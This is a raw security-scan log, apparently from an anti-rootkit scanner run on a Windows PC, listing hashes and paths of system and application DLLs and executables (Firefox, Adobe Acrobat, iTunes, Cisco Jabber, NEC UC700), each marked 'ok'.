15:34:00.0899 0x04bc  [ 2342EC9254F4C60CA98441BD65C89E12, 7FDCAEB5D021E291A1C9B94DD4D49913CE363BF94D37518E466DB3DD72C41D05 ] C:\Windows\SysWOW64\dciman32.dll
15:34:00.0899 0x04bc  C:\Windows\SysWOW64\dciman32.dll - ok
15:34:00.0901 0x04bc  [ 1857767AD90EEC44E2E3AAD4A7C3E7B1, EDFAD2C0000DF022C6E548CFB3D4E642D04628F1BD22E7BFF670C50496F655E3 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\ConfigService\ConfigService.dll
15:34:00.0901 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\ConfigService\ConfigService.dll - ok
15:34:00.0904 0x04bc  [ 1480EEE7D9AA30F238EFC0166FE97162, A4A396FDF83C55B4363437FE5696FB77025D7BD35672CF890CFDD54F54752601 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\SystemMonitor.dll
15:34:00.0904 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\SystemMonitor.dll - ok
15:34:00.0906 0x04bc  [ 7D447550BB6390E76171593E5751E206, EAD44A970BB69012C359D9B6CFA32A61E95FCD8396CC89093276D988777FB9F9 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\7971f3a1c08c4043cf981f457855b4d4\PresentationFramework.Aero.ni.dll
15:34:00.0906 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\7971f3a1c08c4043cf981f457855b4d4\PresentationFramework.Aero.ni.dll - ok
15:34:00.0908 0x04bc  [ D89F78736FEAFEEEDF12DE2895FB2779, AD17BF2B5674E1CD78F6E9B0A5E7867B6EE6F72001B7ADABFEE35C89D32BB2B2 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\0648dbecb7e3fb9523565107e04a5caf\System.Configuration.ni.dll
15:34:00.0908 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\0648dbecb7e3fb9523565107e04a5caf\System.Configuration.ni.dll - ok
15:34:00.0910 0x04bc  [ 7209C39E77FCA57D0265870ABEB213DE, 8EFEF15FEC01AEC6A1D604653DA04F77B68B53429BADAC0264651AF07EE26933 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\bbRGen.dll
15:34:00.0911 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\bbRGen.dll - ok
15:34:00.0913 0x04bc  [ 9989A50A0DFB2B4D3D9E14624DAAA5A1, B17D72B41A65A14CEF40670D7A0DC20F1A3226BFE645351E4EE8D03C8DE20D39 ] C:\Program Files (x86)\Mozilla Firefox\gkmedias.dll
15:34:00.0913 0x04bc  C:\Program Files (x86)\Mozilla Firefox\gkmedias.dll - ok
15:34:00.0915 0x04bc  [ 54ADBBCF6120E3C9C01FCBC5B5683EDE, 2A173219DDF642D2FFFF2256F4F29C8C577F56AE23F0913F7E095F67DCEAC55C ] C:\Program Files (x86)\Mozilla Firefox\mozalloc.dll
15:34:00.0915 0x04bc  C:\Program Files (x86)\Mozilla Firefox\mozalloc.dll - ok
15:34:00.0917 0x04bc  [ 5B55AA6B042D21BD77C7CA91C6EC539E, 29671979A5188008E5FBB29BF233EB5787E8E12D451B961D0DE0A8A3A00E58F9 ] C:\Program Files (x86)\Mozilla Firefox\xul.dll
15:34:00.0917 0x04bc  C:\Program Files (x86)\Mozilla Firefox\xul.dll - ok
15:34:00.0919 0x04bc  [ B4F1A5CCBB14DFB6173BB52AD4D2BE4B, 4C242FF2E8BBAC42E917650B32095A8F61B0042EE5C074FA30866470E6067E34 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\2cf12fa95900b4488a6cb9e4aac51c5c\System.Xml.ni.dll
15:34:00.0919 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\2cf12fa95900b4488a6cb9e4aac51c5c\System.Xml.ni.dll - ok
15:34:00.0921 0x04bc  [ 68ECCA523ED760AAFC03C5D587569859, CDD734279C8F9F24EA2538BAD8E91EB8C3DD74C33032DB6B2D85C19576B42707 ] C:\Windows\SysWOW64\samcli.dll
15:34:00.0921 0x04bc  C:\Windows\SysWOW64\samcli.dll - ok
15:34:00.0923 0x04bc  [ 669E1213976ABF031D6821B10A83CC8C, DD04396CC740817D0EC53440D7857C33DE168D243E69C3B83C76C37D12569EBF ] C:\Program Files (x86)\Mozilla Firefox\browser\components\browsercomps.dll
15:34:00.0923 0x04bc  C:\Program Files (x86)\Mozilla Firefox\browser\components\browsercomps.dll - ok
15:34:00.0925 0x04bc  [ D9747507D0885342B3D94C3FA4A784ED, C6F0FD8B7206B0CC72210CBAFD2ED75433649B11DA9D970D9A74FFCB5FBF6752 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7147fa233a070283dba824da40089bf1\System.Xml.ni.dll
15:34:00.0925 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7147fa233a070283dba824da40089bf1\System.Xml.ni.dll - ok
15:34:00.0928 0x04bc  [ 81F08948A0F1475894C99D4D19A158A8, 93334DA369BF976E498265E432CAF63D898D378C6B32947DF355366ABE2A0FAC ] C:\Windows\SysWOW64\wshqos.dll
15:34:00.0928 0x04bc  C:\Windows\SysWOW64\wshqos.dll - ok
15:34:00.0930 0x04bc  [ 0FE0EDF01CEA3BEB2E65A904BB87525E, 8846CE71FC5DD86151F467B656D886A8E81E337B10A591097E5695BDB2821447 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
15:34:00.0930 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrotray.exe - ok
15:34:00.0932 0x04bc  [ 32BFAE767DE0B73DC0B9F2ACC976F068, 65B1AE831FD99F661CBBD53BE737DAB6F77F504C7D6C474D955A6374971500C8 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
15:34:00.0932 0x04bc  C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll - ok


15:34:00.0934 0x04bc  [ 43C9CF6825CEA58F1815B7C3DBBB385C, C79DB405D588C77E4ACAE3BC26080213BEEB604C0A109AFDF88031FC46B4CBC0 ] C:\Windows\SysWOW64\Wpc.dll
15:34:00.0934 0x04bc  C:\Windows\SysWOW64\Wpc.dll - ok
15:34:00.0936 0x04bc  [ 82C089EA2A3EEFADF3588EA71E8BDADA, 2F3BB32EE2C0673058A74DEEB2D405E5E79F833F33C4D289A93EB3C618A86E75 ] C:\Windows\SysWOW64\wevtapi.dll
15:34:00.0936 0x04bc  C:\Windows\SysWOW64\wevtapi.dll - ok
15:34:00.0937 0x04bc  [ 8E01332CC4B68BC6B5B7EFFE374442AA, A4AD1D2FD3EC2F26949DBBC388F9FFF3713AD7EB4E9220AF817EBB5223E467C6 ] C:\Windows\SysWOW64\oleacc.dll
15:34:00.0937 0x04bc  C:\Windows\SysWOW64\oleacc.dll - ok
15:34:00.0939 0x04bc  [ C30A3E5DEEEBA22E782AC54C5AF5F352, 80939A7B5354032256706C6CA0C3CCC7E67CD1C1C81EAEA2CBC74997C0863662 ] C:\Windows\SysWOW64\samlib.dll
15:34:00.0939 0x04bc  C:\Windows\SysWOW64\samlib.dll - ok
15:34:00.0941 0x04bc  [ 60B60E00FA2A06CC3408FC23DD7292A2, EF6017D3286F4CE29920EF371F24B1450439CFB9D174B063E9463AA11251E55A ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\DesktopShareService\DesktopShareService.dll
15:34:00.0941 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\DesktopShareService\DesktopShareService.dll - ok
15:34:00.0943 0x04bc  [ 243974EC02F7AE49E4179C54624143AB, 755FA67F7BF10E3C6336788D297FBAA70F28F630852A43A78D3F7D7E3A7ECED0 ] C:\Windows\SysWOW64\MMDevAPI.dll
15:34:00.0943 0x04bc  C:\Windows\SysWOW64\MMDevAPI.dll - ok
15:34:00.0945 0x04bc  [ 0A1C81BDCB030222A0B0A652B2C89D8D, 729AA4033009AC894C1EF2A57DFD097BE5D562DDA70533820540904C2EF7882A ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
15:34:00.0945 0x04bc  C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe - ok
15:34:00.0947 0x04bc  [ C940F2F5C60B3727C5F18840735B229C, EFC3F465FD6C570505C214A92644357ACD01B1843ED25B5FCCCE10533403485C ] C:\Windows\SysWOW64\AudioSes.dll
15:34:00.0947 0x04bc  C:\Windows\SysWOW64\AudioSes.dll - ok
15:34:00.0949 0x04bc  [ 6110A057199D66FECA5D341E5E89DF76, 8E5EA8F57BC5165C4606DAFA7EB39E0527DC1224603CB0B5889753E930E77E37 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Esl\Aiod.dll
15:34:00.0949 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Esl\Aiod.dll - ok
15:34:00.0951 0x04bc  [ 0EF0822810009D58118CCDFD098FA9F4, 9FAA263057898BCDBCB0A064C463F48D149474AA339A3C4C47626CC118750D2D ] C:\Program Files (x86)\iTunes\iTunesHelper.exe
15:34:00.0951 0x04bc  C:\Program Files (x86)\iTunes\iTunesHelper.exe - ok
15:34:00.0953 0x04bc  [ 14800BD31701A5047AC3145BB1E698AE, 05B4E33B14B9623EE065634708D9C4CDC7226146F9614C4F374E6B097BB35A50 ] C:\Windows\SysWOW64\d2d1.dll
15:34:00.0953 0x04bc  C:\Windows\SysWOW64\d2d1.dll - ok
15:34:00.0954 0x04bc  [ 536A4997067287E261D904E33F253578, FF5488E3E6542C32A1D8ACF8EECCDE09A17D9FE003F6401CBDA897A021CC5B12 ] C:\Program Files (x86)\iTunes\iTunesHelper.dll
15:34:00.0954 0x04bc  C:\Program Files (x86)\iTunes\iTunesHelper.dll - ok
15:34:00.0956 0x04bc  [ F101EC2ABCDE12CE4E81EEF13A32E1D4, 796ADFD38C3422901F971B784EB72B8702BDF184C43C104B686F3825F43F2823 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrodist.exe
15:34:00.0956 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrodist.exe - ok
15:34:00.0958 0x04bc  [ 0750F7CC03CCAA673270DF11600CCAD6, 5B4B5DB4C6D6788CFB6F8C927CB327DB74A472304EC091E791CD43B5F7973872 ] C:\Program Files (x86)\iTunes\iTunesHelper.Resources\iTunesHelper.dll
15:34:00.0958 0x04bc  C:\Program Files (x86)\iTunes\iTunesHelper.Resources\iTunesHelper.dll - ok
15:34:00.0960 0x04bc  [ C65439FC97BE565644D20A159AA38C4A, 6B966B771AD661661CED0C101C1327564EDCAD3DC74234585392624179DA5B5E ] C:\Program Files (x86)\iTunes\iTunesHelper.Resources\en.lproj\iTunesHelperLocalized.dll
15:34:00.0960 0x04bc  C:\Program Files (x86)\iTunes\iTunesHelper.Resources\en.lproj\iTunesHelperLocalized.dll - ok
15:34:00.0962 0x04bc  [ 6C23D15CC0A1A379199176A8B4CD05CA, EFF4EE73F7B4C6B69ED0D1E6CD33A54CD9EF1DF811DBBB27E6A3D607F5C62E71 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrodistdll.dll
15:34:00.0962 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrodistdll.dll - ok
15:34:00.0964 0x04bc  [ A3FB476B9A92D36F93AB25565D3884F7, 3F7A8070CC393377E11EED217CCA58E7EDDB4EBF41994C50DE3ADA0B2C3D5EC8 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\TelephonyService\TelephonyService.dll
15:34:00.0965 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\TelephonyService\TelephonyService.dll - ok
15:34:00.0967 0x04bc  [ 1C95060AA0B931CF9EE86DDE21FCFC8C, 6BA2B3678612B82CECA82EFD7052235C1F016EC1BEADC9C60A825B68BA1BB94D ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\ahclient.dll
15:34:00.0967 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\ahclient.dll - ok
15:34:00.0969 0x04bc  [ 539C49CEBB3C50957AC8A09D95ECD880, 49E75CDB556FBCE72C44648F8930CF2209C1360F9311C5B4CEB19E13B11E6B75 ] C:\Windows\SysWOW64\shfolder.dll
15:34:00.0969 0x04bc  C:\Windows\SysWOW64\shfolder.dll - ok
15:34:00.0970 0x04bc  [ BD7CDF6F9BF663377D7D73DF252F5DDE, 5E80B7DFC00B204AE470ABCCE5D3E876FE631D14D238E4A0B40F70FBDE4B083C ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\AdobeXMP.dll
15:34:00.0970 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\AdobeXMP.dll - ok
15:34:00.0972 0x04bc  [ AF742C77FF844FFC4050220B97B88975, 7D1B2781889E452D7E1923FC364DB84CEA2DB20D70D5C8048C6DF978290C3E4A ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\ACE.dll
15:34:00.0972 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\ACE.dll - ok
15:34:00.0975 0x04bc  [ 7F8678C59F188528D60104E697C2361E, 9B4D262B10CB09543ACA9A78482F4EDD905791D2C8C518B574EBA440A71A85B7 ] C:\Windows\SysWOW64\mscms.dll
15:34:00.0975 0x04bc  C:\Windows\SysWOW64\mscms.dll - ok
15:34:00.0977 0x04bc  [ EED3EEEDCCF7A71F16FAB63406761BB7, 523352CA3A0A1F199841BD9A5908BE11C27D8A2E2F8BCC1E0B3FC88877B1DAA1 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\AdobePDFL.dll
15:34:00.0977 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\AdobePDFL.dll - ok
15:34:00.0979 0x04bc  [ A081515D303703DD209BA588646ACAF1, EB26A063CBD158A18A86624880CCFD21069593ACA62407F44415819278C1FC01 ] C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\iTunesMobileDevice.dll
15:34:00.0979 0x04bc  C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\iTunesMobileDevice.dll - ok
15:34:00.0983 0x04bc  [ A2A0125DC8633947B5BB660EB4698BE1, BB129919D5B6804015951F1F3E3D838E90BB313E22B528A4528B39C391EF8F7F ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ApplicationLibrary.dll
15:34:00.0983 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ApplicationLibrary.dll - ok
15:34:00.0985 0x04bc  [ E139539D151A7E9B0EDC094DB56972A5, BF0343881BE6F549210E63FA2CBC7AA5B28599AAF15CAB430A3803C7DFB1BB6D ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\JP2KLib.dll
15:34:00.0985 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\JP2KLib.dll - ok
15:34:00.0988 0x04bc  [ 9E0078CAA8BE53DB90FEEF1EEAD912E6, 0AFB2C05F3712B8232C70FC86116D361BA6130E29955D6C62BABAE9DA9D05CA2 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UCSDK.dll
15:34:00.0988 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UCSDK.dll - ok
15:34:00.0990 0x04bc  [ FD86410F03378CF45D5F69BAE0A1F1B9, 0E552304C595F2F91F4EF58FA6743B825385C0F677E4BC8AD7877E123D27D07C ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\BIB.dll
15:34:00.0990 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\BIB.dll - ok
15:34:00.0993 0x04bc  [ 303F5E0604144B4D58E16AE4E1F28D6F, 01762C0060C3A080C3F99C6B7B8574643A904B360BE2BD006484B3E00BE0CBFF ] C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Practices.Prism.UnityExtensions.dll
15:34:00.0993 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Practices.Prism.UnityExtensions.dll - ok
15:34:00.0995 0x04bc  [ D506E7C6DE84BB9F1F9118EF1DC116DA, 7307FFB1F7EF46B9E530AEF0A74F7F879946AF9AAD36CD4527AF6D2582B2DD2E ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\BIBUtils.dll
15:34:00.0995 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\BIBUtils.dll - ok
15:34:00.0998 0x04bc  [ 2A532749F77D7EF8C54798B5C5D4105F, F1043059A9A6630D152BB6A56EFFB3F1E295546AB4CF791487762571866B740F ] C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Practices.Prism.dll
15:34:00.0998 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Practices.Prism.dll - ok
15:34:01.0000 0x04bc  [ 7FAE5B6CDB18B0B2E81F32869F595022, D873A7EE94749E1700E8F6B8BB7B485AE1B0B83388D63BE06335720498D4794F ] C:\Program Files\iPod\bin\iPodService.exe
15:34:01.0000 0x04bc  C:\Program Files\iPod\bin\iPodService.exe - ok
15:34:01.0002 0x04bc  [ B69C180AD707913247EB85EE2E6E3D16, 201655CD2F641AC05E450FB03CE763AFBC5E859D6CE1A25AE7FEF3C27A2EE39A ] C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Practices.Unity.dll
15:34:01.0002 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Practices.Unity.dll - ok
15:34:01.0005 0x04bc  [ 8A581E22ACBD4A743A46F05BE7F78423, 51772DEF18ED6818F3911E30CF0C8F0E9C23F21F7231763854550E1572F37462 ] C:\Program Files\iPod\bin\iPodService.Resources\iPodService.dll
15:34:01.0005 0x04bc  C:\Program Files\iPod\bin\iPodService.Resources\iPodService.dll - ok
15:34:01.0008 0x04bc  [ A5CF34E614E3690906EABEEE2D9E1799, 24D31971502D0C59DC5B26CBAD39CB5785E8676B3CF13FA34A7C26320C2B3FA4 ] C:\Program Files\iPod\bin\iPodService.Resources\en.lproj\iPodServiceLocalized.dll
15:34:01.0008 0x04bc  C:\Program Files\iPod\bin\iPodService.Resources\en.lproj\iPodServiceLocalized.dll - ok
15:34:01.0010 0x04bc  [ 3679F05F524C03A3E79E289A31D060D9, E9C83294784B3558B543BF113EEB9E07EA0684F25AE6952AE9FEE80CF7953BD6 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\AGM.dll
15:34:01.0010 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\AGM.dll - ok
15:34:01.0012 0x04bc  [ EA3594119ACD2DC641B3D19CEE4B99CB, 913DDE28D1182754748F4073CC2DD627B784BB74CFA67994BB085592D413B26B ] C:\Program Files (x86)\Mozilla Firefox\softokn3.dll
15:34:01.0013 0x04bc  C:\Program Files (x86)\Mozilla Firefox\softokn3.dll - ok
15:34:01.0015 0x04bc  [ 919001D2BB17DF06CA3F8AC16AD039F6, 5169ACFBE9E9D4C4012773ECDD28231C952675EF0C272A40F226E7B5D671B18B ] C:\Windows\SysWOW64\sxs.dll
15:34:01.0015 0x04bc  C:\Windows\SysWOW64\sxs.dll - ok
15:34:01.0017 0x04bc  [ 0EF0F552D0C7ABB9533BB45B90C07370, C910D5C6942D0B1E88F13E9D7F3AA630780652152846E496937FF39A2E2E6D79 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\SystemService\SystemService.dll
15:34:01.0017 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\SystemService\SystemService.dll - ok
15:34:01.0019 0x04bc  [ E935B88064020E76F6C3A61528064E67, A376D0FDA547A521B58CDD1D46F5D5431D2729B83C7CFA99245843956523C88C ] C:\Program Files (x86)\Mozilla Firefox\nssdbm3.dll
15:34:01.0019 0x04bc  C:\Program Files (x86)\Mozilla Firefox\nssdbm3.dll - ok
15:34:01.0022 0x04bc  [ 5A7D76392C306FF4486E35321D85CEA6, 5C25F28095AED4642D2943F9E835BE370B49CC535BDDDED365E4CA103323E7DF ] C:\Program Files (x86)\Mozilla Firefox\freebl3.dll
15:34:01.0022 0x04bc  C:\Program Files (x86)\Mozilla Firefox\freebl3.dll - ok
15:34:01.0024 0x04bc  [ DEEE1639E9E6AA2C7688C23212513A25, 2F865C9D8CE9C6930E7AC33DB3F46332A717EBA3FC186DBE3A65569E73D1AF49 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cscomp.dll
15:34:01.0024 0x04bc  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cscomp.dll - ok
15:34:01.0026 0x04bc  [ 442E6FF20279CA880DF8D7FDC0C02E65, 986C418B3392ABA4F1BAB16C112ABB17729DE137282534523218A118B086D9D8 ] C:\Program Files (x86)\Mozilla Firefox\nssckbi.dll
15:34:01.0026 0x04bc  C:\Program Files (x86)\Mozilla Firefox\nssckbi.dll - ok
15:34:01.0028 0x04bc  [ 5B4969B70C763C8D7839C6873CAAAC2A, FA2C4620D1C6B5B6939D7FB0264C70E0E5C7750059CF53D40E0736BC215025E1 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700SidePanelModule.dll
15:34:01.0029 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700SidePanelModule.dll - ok
15:34:01.0031 0x04bc  [ 8EA53101FF2B15BDFF934B62A8FB326D, E28536A4AC6764C2480EF047AF2312AE2600819899C3E33B486CFE19F25AC464 ] C:\Windows\SysWOW64\logoncli.dll
15:34:01.0031 0x04bc  C:\Windows\SysWOW64\logoncli.dll - ok
15:34:01.0033 0x04bc  [ 4CC5B22EE9DA8DD1E4423527D0FACC5D, D2060E6605850E0EDF1C6D423AAA91412988B9089C9530A64A5049F08B4A325F ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700XMPPIMModule.dll
15:34:01.0033 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700XMPPIMModule.dll - ok
15:34:01.0035 0x04bc  [ 92DE707A44FD157767FF8F30C05918E4, 61FE62053E9091600E44DA2E01D931C655201F17205AA4E18906BDDC1830DB01 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\enhanced-callcontrol_MD.dll
15:34:01.0035 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\enhanced-callcontrol_MD.dll - ok
15:34:01.0037 0x04bc  [ A060B9D3F7AFFE353FD85C7554776CAC, B0BBFE24AA9557526FA8772E0CC58D6DEFBEDF7E98007F2579D9B22E0B0CCBDC ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\alink.dll
15:34:01.0037 0x04bc  C:\Windows\Microsoft.NET\Framework\v2.0.50727\alink.dll - ok
15:34:01.0039 0x04bc  [ 6DF78BB163D443D95B21F58808320AF7, 79E7BE6BE7509A1A5263F0292F1462A57744A7C52C4DA6475C70A5054D08C327 ] C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Practices.ServiceLocation.dll
15:34:01.0039 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Practices.ServiceLocation.dll - ok
15:34:01.0042 0x04bc  [ 01DA18D099AC966C5D876B5A9DABA76B, D5C16046D9CA6366F6F480E25A8F6ECAA2FB8A9886C5DA8380D7BDAFEFB2A308 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700LoginModule.dll
15:34:01.0042 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700LoginModule.dll - ok
15:34:01.0044 0x04bc  [ E955300DF949977878C705EC8681009A, 8DF0532317D5A00DF1A1CED769D1944EA5C29FED35C1038C5C9E5486EDA6CCBC ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorpe.dll
15:34:01.0044 0x04bc  C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorpe.dll - ok
15:34:01.0047 0x04bc  [ 6CD38336E84ACE79098B3F86DDB9221D, 029765AFF27964592356A61C1F81895B3B46FC17096871AEDB18A3B698757273 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\CoolType.dll
15:34:01.0047 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\CoolType.dll - ok
15:34:01.0049 0x04bc  [ 200FC355F85ECD4DB77FB3CAB2D01364, C97F276B4C70682C8F8D39B91E30F938BC6E86A42CD6B71E3AD08092DBA528E9 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
15:34:01.0049 0x04bc  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe - ok
15:34:01.0051 0x04bc  [ 523D0A842145F29855AAB2EE814B9754, 333615D98E4E90DE8D9117E0D79E40B1A6CC1CA0E3D2ED7CF969FCD302BF7E95 ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IntelVisualDesign.dll
15:34:01.0051 0x04bc  C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IntelVisualDesign.dll - ok
15:34:01.0054 0x04bc  [ C0AA6E3A39B0BCFBB982E599E24337A7, D8D8B1D2A2AF50E456CC45B32D515585ED0FE7E2C96BEB1201719D7985A3EBAE ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\AXE8SharedExpat.dll
15:34:01.0054 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\AXE8SharedExpat.dll - ok
15:34:01.0056 0x04bc  [ 5DD0CE534C76DAF872E758234928296C, 274E77162D25485A91343AA4B7E319D1292A8080E6E98EF3D59945D20559302C ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\ARE.dll
15:34:01.0056 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\ARE.dll - ok
15:34:01.0059 0x04bc  [ E0E1573836084A9EDA71CA8DC35C6902, 9316B979A73FCA06C4BF066D58419A675093701B3ADACAAF2E0245133DB04391 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\common_MD.dll
15:34:01.0059 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\common_MD.dll - ok
15:34:01.0061 0x04bc  [ 465E5DB7AA1054184E4F0F893A0F1EC6, 5BB1836FDC54B114ABE6CC3786BCA5C714830783DB21862AEF5A3D4460FD336C ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700TopNavigationStatusControlModule.dll
15:34:01.0061 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700TopNavigationStatusControlModule.dll - ok
15:34:01.0064 0x04bc  [ 8DF90B150FFE5BFD81AB2D4607DBAA69, CC32783923E96B118AA9082CA0BF3566731121EE81EDDBBC39CD5F23CCFF006D ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700CallControlModule.dll
15:34:01.0064 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700CallControlModule.dll - ok
15:34:01.0066 0x04bc  [ 2AD690F527CBF63C16B934AD8C7F1D8E, D3E44584D596980609FD6C3857A66915142E4B422FE52D2DB06A060F51E66C2A ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\cpve.dll
15:34:01.0066 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\cpve.dll - ok
15:34:01.0068 0x04bc  [ 0C9B408435DDC6BAAFC85441310CE1F4, 43BDE73C1219022ACD249A5A74745E169F76AB0410850BC5524E457F31A03CE4 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Adist.dll
15:34:01.0068 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Adist.dll - ok
15:34:01.0070 0x04bc  [ 87D2EAC0F0BFD2F16746B9553A79BBA6, A5E20B7E0892EB829361C9DE8B371880C0FB70B2F7A3B1021F1CFFEE30368522 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700SoftPhoneModule.dll
15:34:01.0070 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700SoftPhoneModule.dll - ok
15:34:01.0072 0x04bc  [ 6AA2BD5D2C49E8EDD51E53D7655718FF, D1E0612DC4504DA5ABF9A0715336E4D221D557BF27A1F53E6C1D7126B78C7188 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ContactInformationModule.dll
15:34:01.0072 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ContactInformationModule.dll - ok
15:34:01.0074 0x04bc  [ F6A846376F13BA07F6207B1234B40A72, AF48A5E83C3B8E3578A2121366AF768FBE3A094672F936FA19ECA993B5D0F20F ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ConferenceManagerModule.dll
15:34:01.0074 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ConferenceManagerModule.dll - ok
15:34:01.0077 0x04bc  [ 0EC5E81C6DA21289DF071AD7D9CFDC0F, 4E938E1D58D106F8AD3BD9A20151222A8E16E6D729C7CC2CFB482F16A417175D ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\adistres.dll
15:34:01.0077 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\adistres.dll - ok
15:34:01.0079 0x04bc  [ 9E54945D4DCA8C18F669224993E44157, 9B505981B637BC7D28E8EECF279BADFB72969C7E8337C3157A4699F0D0057B12 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ColloborationModule.dll
15:34:01.0079 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700ColloborationModule.dll - ok
